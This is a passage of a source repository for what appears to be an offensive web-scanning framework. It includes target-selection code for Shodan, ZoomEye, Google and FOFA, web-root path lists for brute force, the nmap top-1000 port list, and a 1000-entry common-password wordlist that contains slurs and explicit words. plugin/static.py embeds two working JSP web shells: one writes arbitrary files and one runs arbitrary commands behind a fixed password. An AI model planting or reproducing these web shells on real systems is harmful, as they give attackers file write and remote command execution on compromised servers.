__zoomeye(): 154 | conf.TARGET_MODE = TARGET_MODE_STATUS.API 155 | conf.API_MODE = API_MODE_NAME.ZOOMEYE 156 | conf.API_DORK = api_zoomeye 157 | 158 | def __shodan(): 159 | conf.TARGET_MODE = TARGET_MODE_STATUS.API 160 | conf.API_MODE = API_MODE_NAME.SHODAN 161 | conf.API_DORK = api_shodan 162 | 163 | def __google(): 164 | conf.TARGET_MODE = TARGET_MODE_STATUS.API 165 | conf.API_MODE = API_MODE_NAME.GOOGLE 166 | conf.API_DORK = api_google 167 | 168 | def __fofa(): 169 | conf.TARGET_MODE = TARGET_MODE_STATUS.API 170 | conf.API_MODE = API_MODE_NAME.FOFA 171 | conf.API_DORK = api_fofa 172 | 173 | msg = 'Please load targets with [-iS|-iA|-iF|-iN] or use API with [-aZ|-aS|-aG|-aF]' 174 | r = Register(mutex=True, mutex_errmsg=msg) 175 | r.add(__file, input_file) 176 | r.add(__network, input_network) 177 | r.add(__array, input_array) 178 | r.add(__single, input_single) 179 | r.add(__zoomeye, api_zoomeye) 180 | r.add(__shodan, api_shodan) 181 | r.add(__google, api_google) 182 | r.add(__fofa, api_fofa) 183 | r.run() 184 | 185 | 186 | def ApiRegister(args): 187 | search_type = args.search_type 188 | offset = args.api_offset 189 | google_proxy = args.google_proxy 190 | api_limit = args.api_limit 191 | 192 | if not 'API_MODE' in conf: 193 | return 194 | 195 | if not conf.API_DORK: 196 | msg = 'Empty API dork, show usage with [-h]' 197 | sys.exit(logger.error(msg)) 198 | 199 | if offset < 0: 200 | msg = 'Invalid value in [--offset], show usage with [-h]' 201 | sys.exit(logger.error(msg)) 202 | else: 203 | conf.API_OFFSET = offset 204 | 205 | # handle typeError in cmdline.py 206 | if api_limit <= 0: 207 | msg = 'Invalid value in [--limit], show usage with [-h]' 208 | sys.exit(logger.error(msg)) 209 | else: 210 | conf.API_LIMIT = api_limit 211 | 212 | if conf.API_MODE is API_MODE_NAME.ZOOMEYE: 213 | if search_type not in ['web', 'host']: 214 | msg = 'Invalid value in [--search-type], show usage with [-h]' 215 | sys.exit(logger.error(msg)) 216 | else: 217 | conf.ZOOMEYE_SEARCH_TYPE = search_type 218 | 219 | elif conf.API_MODE is API_MODE_NAME.GOOGLE: 220 | conf.GOOGLE_PROXY = google_proxy 221 | 222 | 223 | def Output(args): 224 | output_file = args.output_path 225 | file_status = args.output_file_status 226 | screen_status = args.output_screen_status 227 | browser = args.open_browser 228 | 229 | if not file_status and output_file: 230 | msg = 'Cannot use [-oF] and [-o] together, please read the usage with [-h].' 231 | sys.exit(logger.error(msg)) 232 | 233 | if not file_status and browser: 234 | msg = '[--browser] is based on file output, please remove [-oF] in your command and try again.' 235 | sys.exit(logger.error(msg)) 236 | 237 | conf.SCREEN_OUTPUT = screen_status 238 | conf.FILE_OUTPUT = file_status 239 | conf.OUTPUT_FILE_PATH = os.path.abspath(output_file) if output_file else \ 240 | os.path.abspath( 241 | os.path.join( 242 | paths.OUTPUT_PATH, time.strftime( 243 | '[%Y%m%d-%H%M%S]', time.localtime( 244 | time.time())) + conf.MODULE_NAME + '.txt')) 245 | 246 | 247 | def Misc(args): 248 | conf.SINGLE_MODE = args.single_mode 249 | conf.OPEN_BROWSER = args.open_browser -------------------------------------------------------------------------------- /plugin/static.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # auther = Syst1m 4 | 5 | class ABSPATH_PREFIXES: 6 | LINUX = ( 7 | "/var/www", "/usr/local/apache", "/usr/local/apache2", "/usr/local/www/apache22", "/usr/local/www/apache24", 8 | "/usr/local/httpd", "/var/www/nginx-default", "/srv/www", "/var/www/vhosts", 9 | "/var/www/virtual", "/var/www/clients/vhosts", "/var/www/clients/virtual") 10 | WINDOWS = ( 11 | "/xampp", "/Program Files/xampp", "/wamp", "/Program Files/wampp", "/apache", 12 | "/Program Files/Apache Group/Apache", 13 | "/Program Files/Apache Group/Apache2", "/Program Files/Apache Group/Apache2.2", 14 | "/Program Files/Apache Group/Apache2.4", "/Inetpub/wwwroot", 15 | "/Inetpub/vhosts") 16 | ALL = LINUX + WINDOWS 17 | 18 | 19 | # Suffixes used in brute force search for web server document root 20 | ABSPATH_SUFFIXES = ( 21 | "html", "htdocs", "httpdocs", "php", "public", "src", "site", "build", "web", "www", "data", "sites/all", 22 | "www/build") 23 | 24 | JSP_UPLOAD = """<%@page contentType="text/html; charset=GBK" import="java.io.*;"%> 25 | JSP 26 | <% 27 | String path=request.getParameter("path"); 28 | String content=request.getParameter("content"); 29 | String url=request.getRequestURI(); 30 | String relativeurl=url.substring(url.indexOf('/',1)); 31 | String absolutepath=application.getRealPath(relativeurl); 32 | if (path!=null && !path.equals("") && content!=null && !content.equals("")){ 33 | try{ 34 | File newfile=new File(path); 35 | PrintWriter writer=new PrintWriter(newfile); 36 | writer.println(content); 37 | writer.close(); 38 | if (newfile.exists() && newfile.length()>0){ 39 | out.println("save success!"); 40 | }else{ 41 | out.println("save failed!"); 42 | } 43 | }catch(Exception e){ 44 | e.printStackTrace(); 45 | } 46 | } 47 | out.println("
"); 48 | out.println("save path:

"); 49 | out.println("current path "+absolutepath+"
"); 50 | out.println("
"); 51 | out.println(""); 52 | out.println("
"); 53 | %> 54 | """ 55 | 56 | JSP_RCE = """<% 57 | if("023".equals(request.getParameter("pwd"))){ 58 | java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); 59 | int a = -1; 60 | byte[] b = new byte[2048]; 61 | out.print("
");
 62 |         while((a=in.read(b))!=-1){
 63 |             out.println(new String(b,0,a));
 64 |         }
 65 |         out.print("
"); 66 | } 67 | %>""" 68 | 69 | NMAP_PORTS_1000 = \ 70 | ['1', '3', '4', '6', '7', '9', '13', '17', '19', '20', '21', '22', '23', '24', '25', '26', '30', '32', '33', 71 | '37', '42', '43', '49', '53', '70', '79', '80', '81', '82', '83', '84', '85', '88', '89', '90', '99', '100', 72 | '106', '109', '110', '111', '113', '119', '125', '135', '139', '143', '144', '146', '161', '163', '179', '199', 73 | '211', '212', '222', '254', '255', '256', '259', '264', '280', '301', '306', '311', '340', '366', '389', '406', 74 | '407', '416', '417', '425', '427', '443', '444', '445', '458', '464', '465', '481', '497', '500', '512', '513', 75 | '514', '515', '524', '541', '543', '544', '545', '548', '554', '555', '563', '587', '593', '616', '617', '625', 76 | '631', '636', '646', '648', '666', '667', '668', '683', '687', '691', '700', '705', '711', '714', '720', '722', 77 | '726', '749', '765', '777', '783', '787', '800', '801', '808', '843', '873', '880', '888', '898', '900', '901', 78 | '902', '903', '911', '912', '981', '987', '990', '992', '993', '995', '999', '1000', '1001', '1002', '1007', 79 | '1009', '1010', '1011', '1021', '1022', '1023', '1024', '1025', '1026', '1027', '1028', '1029', '1030', '1031', 80 | '1032', '1033', '1034', '1035', '1036', '1037', '1038', '1039', '1040', '1041', '1042', '1043', '1044', '1045', 81 | '1046', '1047', '1048', '1049', '1050', '1051', '1052', '1053', '1054', '1055', '1056', '1057', '1058', '1059', 82 | '1060', '1061', '1062', '1063', '1064', '1065', '1066', '1067', '1068', '1069', '1070', '1071', '1072', '1073', 83 | '1074', '1075', '1076', '1077', '1078', '1079', '1080', '1081', '1082', '1083', '1084', '1085', '1086', '1087', 84 | '1088', '1089', '1090', '1091', '1092', '1093', '1094', '1095', '1096', '1097', '1098', '1099', '1100', '1102', 85 | '1104', '1105', '1106', '1107', '1108', '1110', '1111', '1112', '1113', '1114', '1117', '1119', '1121', '1122', 86 | '1123', '1124', '1126', '1130', '1131', '1132', '1137', '1138', '1141', '1145', '1147', '1148', '1149', '1151', 87 | '1152', '1154', '1163', '1164', '1165', '1166', '1169', '1174', '1175', '1183', '1185', '1186', '1187', '1192', 88 | '1198', '1199', '1201', '1213', '1216', '1217', '1218', '1233', '1234', '1236', '1244', '1247', '1248', '1259', 89 | '1271', '1272', '1277', '1287', '1296', '1300', '1301', '1309', '1310', '1311', '1322', '1328', '1334', '1352', 90 | '1417', '1433', '1434', '1443', '1455', '1461', '1494', '1500', '1501', '1503', '1521', '1524', '1533', '1556', 91 | '1580', '1583', '1594', '1600', '1641', '1658', '1666', '1687', '1688', '1700', '1717', '1718', '1719', '1720', 92 | '1721', '1723', '1755', '1761', '1782', '1783', '1801', '1805', '1812', '1839', '1840', '1862', '1863', '1864', 93 | '1875', '1900', '1914', '1935', '1947', '1971', '1972', '1974', '1984', '1998', '1999', '2000', '2001', '2002', 94 | '2003', '2004', '2005', '2006', '2007', '2008', '2009', '2010', '2013', '2020', '2021', '2022', '2030', '2033', 95 | '2034', '2035', '2038', '2040', '2041', '2042', '2043', '2045', '2046', '2047', '2048', '2049', '2065', '2068', 96 | '2099', '2100', '2103', '2105', '2106', '2107', '2111', '2119', '2121', '2126', '2135', '2144', '2160', '2161', 97 | '2170', '2179', '2190', '2191', '2196', '2200', '2222', '2251', '2260', '2288', '2301', '2323', '2366', '2381', 98 | '2382', '2383', '2393', '2394', '2399', '2401', '2492', '2500', '2522', '2525', '2557', '2601', '2602', '2604', 99 | '2605', '2607', '2608', '2638', '2701', '2702', '2710', '2717', '2718', '2725', '2800', '2809', '2811', '2869', 100 | '2875', '2909', '2910', '2920', '2967', '2968', '2998', '3000', '3001', '3003', '3005', '3006', '3007', '3011', 101 | '3013', '3017', '3030', '3031', '3052', '3071', '3077', '3128', '3168', '3211', '3221', '3260', '3261', '3268', 102 | '3269', '3283', '3300', '3301', '3306', '3322', '3323', '3324', '3325', '3333', '3351', '3367', '3369', '3370', 103 | '3371', '3372', '3389', '3390', '3404', '3476', '3493', '3517', '3527', '3546', '3551', '3580', '3659', '3689', 104 | '3690', '3703', '3737', '3766', '3784', '3800', '3801', '3809', '3814', '3826', '3827', '3828', '3851', '3869', 105 | '3871', '3878', '3880', '3889', '3905', '3914', '3918', '3920', '3945', '3971', '3986', '3995', '3998', '4000', 106 | '4001', '4002', '4003', '4004', '4005', '4006', '4045', '4111', '4125', '4126', '4129', '4224', '4242', '4279', 107 | '4321', '4343', '4443', '4444', '4445', '4446', '4449', '4550', '4567', '4662', '4848', '4899', '4900', '4998', 108 | '5000', '5001', '5002', '5003', '5004', '5009', '5030', '5033', '5050', '5051', '5054', '5060', '5061', '5080', 109 | '5087', '5100', '5101', '5102', '5120', '5190', '5200', '5214', '5221', '5222', '5225', '5226', '5269', '5280', 110 | '5298', '5357', '5405', '5414', '5431', '5432', '5440', '5500', '5510', '5544', '5550', '5555', '5560', '5566', 111 | '5631', '5633', '5666', '5678', '5679', '5718', '5730', '5800', '5801', '5802', '5810', '5811', '5815', '5822', 112 | '5825', '5850', '5859', '5862', '5877', '5900', '5901', '5902', '5903', '5904', '5906', '5907', '5910', '5911', 113 | '5915', '5922', '5925', '5950', '5952', '5959', '5960', '5961', '5962', '5963', '5987', '5988', '5989', '5998', 114 | '5999', '6000', '6001', '6002', '6003', '6004', '6005', '6006', '6007', '6009', '6025', '6059', '6100', '6101', 115 | '6106', '6112', '6123', '6129', '6156', '6346', '6389', '6502', '6510', '6543', '6547', '6565', '6566', '6567', 116 | '6580', '6646', '6666', '6667', '6668', '6669', '6689', '6692', '6699', '6779', '6788', '6789', '6792', '6839', 117 | '6881', '6901', '6969', '7000', '7001', '7002', '7004', '7007', '7019', '7025', '7070', '7100', '7103', '7106', 118 | '7200', '7201', '7402', '7435', '7443', '7496', '7512', '7625', '7627', '7676', '7741', '7777', '7778', '7800', 119 | '7911', '7920', '7921', '7937', '7938', '7999', '8000', '8001', '8002', '8007', '8008', '8009', '8010', '8011', 120 | '8021', '8022', '8031', '8042', '8045', '8080', '8081', '8082', '8083', '8084', '8085', '8086', '8087', '8088', 121 | '8089', '8090', '8093', '8099', '8100', '8180', '8181', '8192', '8193', '8194', '8200', '8222', '8254', '8290', 122 | '8291', '8292', '8300', '8333', '8383', '8400', '8402', '8443', '8500', '8600', '8649', '8651', '8652', '8654', 123 | '8701', '8800', '8873', '8888', '8899', '8994', '9000', '9001', '9002', '9003', '9009', '9010', '9011', '9040', 124 | '9050', '9071', '9080', '9081', '9090', '9091', '9099', '9100', '9101', '9102', '9103', '9110', '9111', '9200', 125 | '9207', '9220', '9290', '9415', '9418', '9485', '9500', '9502', '9503', '9535', '9575', '9593', '9594', '9595', 126 | '9618', '9666', '9876', '9877', '9878', '9898', '9900', '9917', '9929', '9943', '9944', '9968', '9998', '9999', 127 | '10000', '10001', '10002', '10003', '10004', '10009', '10010', '10012', '10024', '10025', '10082', '10180', 128 | '10215', '10243', '10566', '10616', '10617', '10621', '10626', '10628', '10629', '10778', '11110', '11111', 129 | '11967', '12000', '12174', '12265', '12345', '13456', '13722', '13782', '13783', '14000', '14238', '14441', 130 | '14442', '15000', '15002', '15003', '15004', '15660', '15742', '16000', '16001', '16012', '16016', '16018', 131 | '16080', '16113', '16992', '16993', '17877', '17988', '18040', '18101', '18988', '19101', '19283', '19315', 132 | '19350', '19780', '19801', '19842', '20000', '20005', '20031', '20221', '20222', '20828', '21571', '22939', 133 | '23502', '24444', '24800', '25734', '25735', '26214', '27000', '27352', '27353', '27355', '27356', '27715', 134 | '28201', '30000', '30718', '30951', '31038', '31337', '32768', '32769', '32770', '32771', '32772', '32773', 135 | '32774', '32775', '32776', '32777', '32778', '32779', '32780', '32781', '32782', '32783', '32784', '32785', 136 | '33354', '33899', '34571', '34572', '34573', '35500', '38292', '40193', '40911', '41511', '42510', '44176', 137 | '44442', '44443', '44501', '45100', '48080', '49152', '49153', '49154', '49155', '49156', '49157', '49158', 138 | '49159', '49160', '49161', '49163', '49165', '49167', '49175', '49176', '49400', '49999', '50000', '50001', 139 | '50002', '50003', '50006', '50300', '50389', '50500', '50636', '50800', '51103', '51493', '52673', '52822', 140 | '52848', '52869', '54045', '54328', '55055', '55056', '55555', '55600', '56737', '56738', '57294', '57797', 141 | '58080', '60020', '60443', '61532', '61900', '62078', '63331', '64623', '64680', '65000', '65129', '65389'] 142 | -------------------------------------------------------------------------------- /data/pass1000.txt: -------------------------------------------------------------------------------- 1 | password 2 | 123456 3 | 12345678 4 | 1234 5 | qwerty 6 | 12345 7 | dragon 8 | pussy 9 | baseball 10 | football 11 | letmein 12 | monkey 13 | 696969 14 | abc123 15 | mustang 16 | michael 17 | shadow 18 | master 19 | jennifer 20 | 111111 21 | 2000 22 | jordan 23 | superman 24 | harley 25 | 1234567 26 | fuckme 27 | hunter 28 | fuckyou 29 | trustno1 30 | ranger 31 | buster 32 | thomas 33 | tigger 34 | robert 35 | soccer 36 | fuck 37 | batman 38 | test 39 | pass 40 | killer 41 | hockey 42 | george 43 | charlie 44 | andrew 45 | michelle 46 | love 47 | sunshine 48 | jessica 49 | asshole 50 | 6969 51 | pepper 52 | daniel 53 | access 54 | 123456789 55 | 654321 56 | joshua 57 | maggie 58 | starwars 59 | silver 60 | william 61 | dallas 62 | yankees 63 | 123123 64 | ashley 65 | 666666 66 | hello 67 | amanda 68 | orange 69 | biteme 70 | freedom 71 | computer 72 | sexy 73 | thunder 74 | nicole 75 | ginger 76 | heather 77 | hammer 78 | summer 79 | corvette 80 | taylor 81 | fucker 82 | austin 83 | 1111 84 | merlin 85 | matthew 86 | 121212 87 | golfer 88 | cheese 89 | princess 90 | martin 91 | chelsea 92 | patrick 93 | richard 94 | diamond 95 | yellow 96 | bigdog 97 | secret 98 | asdfgh 99 | sparky 100 | cowboy 101 | camaro 102 | anthony 103 | matrix 104 | falcon 105 | iloveyou 106 | bailey 107 | guitar 108 | jackson 109 | purple 110 | scooter 111 | phoenix 112 | aaaaaa 113 | morgan 114 | tigers 115 | porsche 116 | mickey 117 | maverick 118 | cookie 119 | nascar 120 | peanut 121 | justin 122 | 131313 123 | money 124 | horny 125 | samantha 126 | panties 127 | steelers 128 | joseph 129 | snoopy 130 | boomer 131 | whatever 132 | iceman 133 | smokey 134 | gateway 135 | dakota 136 | cowboys 137 | eagles 138 | chicken 139 | dick 140 | black 141 | zxcvbn 142 | please 143 | andrea 144 | ferrari 145 | knight 146 | hardcore 147 | melissa 148 | compaq 149 | coffee 150 | booboo 151 | bitch 152 | johnny 153 | bulldog 154 | xxxxxx 155 | welcome 156 | james 157 | player 158 | ncc1701 159 | wizard 160 | scooby 161 | charles 162 | junior 163 | internet 164 | bigdick 165 | mike 166 | brandy 167 | tennis 168 | blowjob 169 | banana 170 | monster 171 | spider 172 | lakers 173 | miller 174 | rabbit 175 | enter 176 | mercedes 177 | brandon 178 | steven 179 | fender 180 | john 181 | yamaha 182 | diablo 183 | chris 184 | boston 185 | tiger 186 | marine 187 | chicago 188 | rangers 189 | gandalf 190 | winter 191 | bigtits 192 | barney 193 | edward 194 | raiders 195 | porn 196 | badboy 197 | blowme 198 | spanky 199 | bigdaddy 200 | johnson 201 | chester 202 | london 203 | midnight 204 | blue 205 | fishing 206 | 000000 207 | hannah 208 | slayer 209 | 11111111 210 | rachel 211 | sexsex 212 | redsox 213 | thx1138 214 | asdf 215 | marlboro 216 | panther 217 | zxcvbnm 218 | arsenal 219 | oliver 220 | qazwsx 221 | mother 222 | victoria 223 | 7777777 224 | jasper 225 | angel 226 | david 227 | winner 228 | crystal 229 | golden 230 | butthead 231 | viking 232 | jack 233 | iwantu 234 | shannon 235 | murphy 236 | angels 237 | prince 238 | cameron 239 | girls 240 | madison 241 | wilson 242 | carlos 243 | hooters 244 | willie 245 | startrek 246 | captain 247 | maddog 248 | jasmine 249 | butter 250 | booger 251 | angela 252 | golf 253 | lauren 254 | rocket 255 | tiffany 256 | theman 257 | dennis 258 | liverpoo 259 | flower 260 | forever 261 | green 262 | jackie 263 | muffin 264 | turtle 265 | sophie 266 | danielle 267 | redskins 268 | toyota 269 | jason 270 | sierra 271 | winston 272 | debbie 273 | giants 274 | packers 275 | newyork 276 | jeremy 277 | casper 278 | bubba 279 | 112233 280 | sandra 281 | lovers 282 | mountain 283 | united 284 | cooper 285 | driver 286 | tucker 287 | helpme 288 | fucking 289 | pookie 290 | lucky 291 | maxwell 292 | 8675309 293 | bear 294 | suckit 295 | gators 296 | 5150 297 | 222222 298 | shithead 299 | fuckoff 300 | jaguar 301 | monica 302 | fred 303 | happy 304 | hotdog 305 | tits 306 | gemini 307 | lover 308 | xxxxxxxx 309 | 777777 310 | canada 311 | nathan 312 | victor 313 | florida 314 | 88888888 315 | nicholas 316 | rosebud 317 | metallic 318 | doctor 319 | trouble 320 | success 321 | stupid 322 | tomcat 323 | warrior 324 | peaches 325 | apples 326 | fish 327 | qwertyui 328 | magic 329 | buddy 330 | dolphins 331 | rainbow 332 | gunner 333 | 987654 334 | freddy 335 | alexis 336 | braves 337 | cock 338 | 2112 339 | 1212 340 | cocacola 341 | xavier 342 | dolphin 343 | testing 344 | bond007 345 | member 346 | calvin 347 | voodoo 348 | 7777 349 | samson 350 | alex 351 | apollo 352 | fire 353 | tester 354 | walter 355 | beavis 356 | voyager 357 | peter 358 | porno 359 | bonnie 360 | rush2112 361 | beer 362 | apple 363 | scorpio 364 | jonathan 365 | skippy 366 | sydney 367 | scott 368 | red123 369 | power 370 | gordon 371 | travis 372 | beaver 373 | star 374 | jackass 375 | flyers 376 | boobs 377 | 232323 378 | zzzzzz 379 | steve 380 | rebecca 381 | scorpion 382 | doggie 383 | legend 384 | ou812 385 | yankee 386 | blazer 387 | bill 388 | runner 389 | birdie 390 | bitches 391 | 555555 392 | parker 393 | topgun 394 | asdfasdf 395 | heaven 396 | viper 397 | animal 398 | 2222 399 | bigboy 400 | 4444 401 | arthur 402 | baby 403 | private 404 | godzilla 405 | donald 406 | williams 407 | lifehack 408 | phantom 409 | dave 410 | rock 411 | august 412 | sammy 413 | cool 414 | brian 415 | platinum 416 | jake 417 | bronco 418 | paul 419 | mark 420 | frank 421 | heka6w2 422 | copper 423 | billy 424 | cumshot 425 | garfield 426 | willow 427 | cunt 428 | little 429 | carter 430 | slut 431 | albert 432 | 69696969 433 | kitten 434 | super 435 | jordan23 436 | eagle1 437 | shelby 438 | america 439 | 11111 440 | jessie 441 | house 442 | free 443 | 123321 444 | chevy 445 | bullshit 446 | white 447 | broncos 448 | horney 449 | surfer 450 | nissan 451 | 999999 452 | saturn 453 | airborne 454 | elephant 455 | marvin 456 | shit 457 | action 458 | adidas 459 | qwert 460 | kevin 461 | 1313 462 | explorer 463 | walker 464 | police 465 | christin 466 | december 467 | benjamin 468 | wolf 469 | sweet 470 | therock 471 | king 472 | online 473 | dickhead 474 | brooklyn 475 | teresa 476 | cricket 477 | sharon 478 | dexter 479 | racing 480 | penis 481 | gregory 482 | 0000 483 | teens 484 | redwings 485 | dreams 486 | michigan 487 | hentai 488 | magnum 489 | 87654321 490 | nothing 491 | donkey 492 | trinity 493 | digital 494 | 333333 495 | stella 496 | cartman 497 | guinness 498 | 123abc 499 | speedy 500 | buffalo 501 | kitty 502 | pimpin 503 | eagle 504 | einstein 505 | kelly 506 | nelson 507 | nirvana 508 | vampire 509 | xxxx 510 | playboy 511 | louise 512 | pumpkin 513 | snowball 514 | test123 515 | girl 516 | sucker 517 | mexico 518 | beatles 519 | fantasy 520 | ford 521 | gibson 522 | celtic 523 | marcus 524 | cherry 525 | cassie 526 | 888888 527 | natasha 528 | sniper 529 | chance 530 | genesis 531 | hotrod 532 | reddog 533 | alexande 534 | college 535 | jester 536 | passw0rd 537 | bigcock 538 | smith 539 | lasvegas 540 | carmen 541 | slipknot 542 | 3333 543 | death 544 | kimberly 545 | 1q2w3e 546 | eclipse 547 | 1q2w3e4r 548 | stanley 549 | samuel 550 | drummer 551 | homer 552 | montana 553 | music 554 | aaaa 555 | spencer 556 | jimmy 557 | carolina 558 | colorado 559 | creative 560 | hello1 561 | rocky 562 | goober 563 | friday 564 | bollocks 565 | scotty 566 | abcdef 567 | bubbles 568 | hawaii 569 | fluffy 570 | mine 571 | stephen 572 | horses 573 | thumper 574 | 5555 575 | pussies 576 | darkness 577 | asdfghjk 578 | pamela 579 | boobies 580 | buddha 581 | vanessa 582 | sandman 583 | naughty 584 | douglas 585 | honda 586 | matt 587 | azerty 588 | 6666 589 | shorty 590 | money1 591 | beach 592 | loveme 593 | 4321 594 | simple 595 | poohbear 596 | 444444 597 | badass 598 | destiny 599 | sarah 600 | denise 601 | vikings 602 | lizard 603 | melanie 604 | assman 605 | sabrina 606 | nintendo 607 | water 608 | good 609 | howard 610 | time 611 | 123qwe 612 | november 613 | xxxxx 614 | october 615 | leather 616 | bastard 617 | young 618 | 101010 619 | extreme 620 | hard 621 | password1 622 | vincent 623 | pussy1 624 | lacrosse 625 | hotmail 626 | spooky 627 | amateur 628 | alaska 629 | badger 630 | paradise 631 | maryjane 632 | poop 633 | crazy 634 | mozart 635 | video 636 | russell 637 | vagina 638 | spitfire 639 | anderson 640 | norman 641 | eric 642 | cherokee 643 | cougar 644 | barbara 645 | long 646 | 420420 647 | family 648 | horse 649 | enigma 650 | allison 651 | raider 652 | brazil 653 | blonde 654 | jones 655 | 55555 656 | dude 657 | drowssap 658 | jeff 659 | school 660 | marshall 661 | lovely 662 | 1qaz2wsx 663 | jeffrey 664 | caroline 665 | franklin 666 | booty 667 | molly 668 | snickers 669 | leslie 670 | nipples 671 | courtney 672 | diesel 673 | rocks 674 | eminem 675 | westside 676 | suzuki 677 | daddy 678 | passion 679 | hummer 680 | ladies 681 | zachary 682 | frankie 683 | elvis 684 | reggie 685 | alpha 686 | suckme 687 | simpson 688 | patricia 689 | 147147 690 | pirate 691 | tommy 692 | semperfi 693 | jupiter 694 | redrum 695 | freeuser 696 | wanker 697 | stinky 698 | ducati 699 | paris 700 | natalie 701 | babygirl 702 | bishop 703 | windows 704 | spirit 705 | pantera 706 | monday 707 | patches 708 | brutus 709 | houston 710 | smooth 711 | penguin 712 | marley 713 | forest 714 | cream 715 | 212121 716 | flash 717 | maximus 718 | nipple 719 | bobby 720 | bradley 721 | vision 722 | pokemon 723 | champion 724 | fireman 725 | indian 726 | softball 727 | picard 728 | system 729 | clinton 730 | cobra 731 | enjoy 732 | lucky1 733 | claire 734 | claudia 735 | boogie 736 | timothy 737 | marines 738 | security 739 | dirty 740 | admin 741 | wildcats 742 | pimp 743 | dancer 744 | hardon 745 | veronica 746 | fucked 747 | abcd1234 748 | abcdefg 749 | ironman 750 | wolverin 751 | remember 752 | great 753 | freepass 754 | bigred 755 | squirt 756 | justice 757 | francis 758 | hobbes 759 | kermit 760 | pearljam 761 | mercury 762 | domino 763 | 9999 764 | denver 765 | brooke 766 | rascal 767 | hitman 768 | mistress 769 | simon 770 | tony 771 | bbbbbb 772 | friend 773 | peekaboo 774 | naked 775 | budlight 776 | electric 777 | sluts 778 | stargate 779 | saints 780 | bondage 781 | brittany 782 | bigman 783 | zombie 784 | swimming 785 | duke 786 | qwerty1 787 | babes 788 | scotland 789 | disney 790 | rooster 791 | brenda 792 | mookie 793 | swordfis 794 | candy 795 | duncan 796 | olivia 797 | hunting 798 | blink182 799 | alicia 800 | 8888 801 | samsung 802 | bubba1 803 | whore 804 | virginia 805 | general 806 | passport 807 | aaaaaaaa 808 | erotic 809 | liberty 810 | arizona 811 | jesus 812 | abcd 813 | newport 814 | skipper 815 | rolltide 816 | balls 817 | happy1 818 | galore 819 | christ 820 | weasel 821 | 242424 822 | wombat 823 | digger 824 | classic 825 | bulldogs 826 | poopoo 827 | accord 828 | popcorn 829 | turkey 830 | jenny 831 | amber 832 | bunny 833 | mouse 834 | 007007 835 | titanic 836 | liverpool 837 | dreamer 838 | everton 839 | friends 840 | chevelle 841 | carrie 842 | gabriel 843 | psycho 844 | nemesis 845 | burton 846 | pontiac 847 | connor 848 | eatme 849 | lickme 850 | roland 851 | cumming 852 | mitchell 853 | ireland 854 | lincoln 855 | arnold 856 | spiderma 857 | patriots 858 | goblue 859 | devils 860 | eugene 861 | empire 862 | asdfg 863 | cardinal 864 | brown 865 | shaggy 866 | froggy 867 | qwer 868 | kawasaki 869 | kodiak 870 | people 871 | phpbb 872 | light 873 | 54321 874 | kramer 875 | chopper 876 | hooker 877 | honey 878 | whynot 879 | lesbian 880 | lisa 881 | baxter 882 | adam 883 | snake 884 | teen 885 | ncc1701d 886 | qqqqqq 887 | airplane 888 | britney 889 | avalon 890 | sandy 891 | sugar 892 | sublime 893 | stewart 894 | wildcat 895 | raven 896 | scarface 897 | elizabet 898 | 123654 899 | trucks 900 | wolfpack 901 | pervert 902 | lawrence 903 | raymond 904 | redhead 905 | american 906 | alyssa 907 | bambam 908 | movie 909 | woody 910 | shaved 911 | snowman 912 | tiger1 913 | chicks 914 | raptor 915 | 1969 916 | stingray 917 | shooter 918 | france 919 | stars 920 | madmax 921 | kristen 922 | sports 923 | jerry 924 | 789456 925 | garcia 926 | simpsons 927 | lights 928 | ryan 929 | looking 930 | chronic 931 | alison 932 | hahaha 933 | packard 934 | hendrix 935 | perfect 936 | service 937 | spring 938 | srinivas 939 | spike 940 | katie 941 | 252525 942 | oscar 943 | brother 944 | bigmac 945 | suck 946 | single 947 | cannon 948 | georgia 949 | popeye 950 | tattoo 951 | texas 952 | party 953 | bullet 954 | taurus 955 | sailor 956 | wolves 957 | panthers 958 | japan 959 | strike 960 | flowers 961 | pussycat 962 | chris1 963 | loverboy 964 | berlin 965 | sticky 966 | marina 967 | tarheels 968 | fisher 969 | russia 970 | connie 971 | wolfgang 972 | testtest 973 | mature 974 | bass 975 | catch22 976 | juice 977 | michael1 978 | nigger 979 | 159753 980 | women 981 | alpha1 982 | trooper 983 | hawkeye 984 | head 985 | freaky 986 | dodgers 987 | pakistan 988 | machine 989 | pyramid 990 | vegeta 991 | katana 992 | moose 993 | tinker 994 | coyote 995 | infinity 996 | inside 997 | pepsi 998 | letmein1 999 | bang 1000 | control -------------------------------------------------------------------------------- /thirdparty/httplib2/socks.py: -------------------------------------------------------------------------------- 1 | """SocksiPy - Python SOCKS module. 2 | 3 | Version 1.00 4 | 5 | Copyright 2006 Dan-Haim. All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without modification, 8 | are permitted provided that the following conditions are met: 9 | 1. Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 2. Redistributions in binary form must reproduce the above copyright notice, 12 | this list of conditions and the following disclaimer in the documentation 13 | and/or other materials provided with the distribution. 14 | 3. Neither the name of Dan Haim nor the names of his contributors may be used 15 | to endorse or promote products derived from this software without specific 16 | prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY DAN HAIM "AS IS" AND ANY EXPRESS OR IMPLIED 19 | WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF 20 | MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO 21 | EVENT SHALL DAN HAIM OR HIS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, 22 | INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT 23 | LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA 24 | OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF 25 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT 26 | OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMANGE. 27 | 28 | This module provides a standard socket-like interface for Python 29 | for tunneling connections through SOCKS proxies. 30 | 31 | Minor modifications made by Christopher Gilbert (http://motomastyle.com/) for 32 | use in PyLoris (http://pyloris.sourceforge.net/). 33 | 34 | Minor modifications made by Mario Vilas (http://breakingcode.wordpress.com/) 35 | mainly to merge bug fixes found in Sourceforge. 36 | """ 37 | 38 | import base64 39 | import 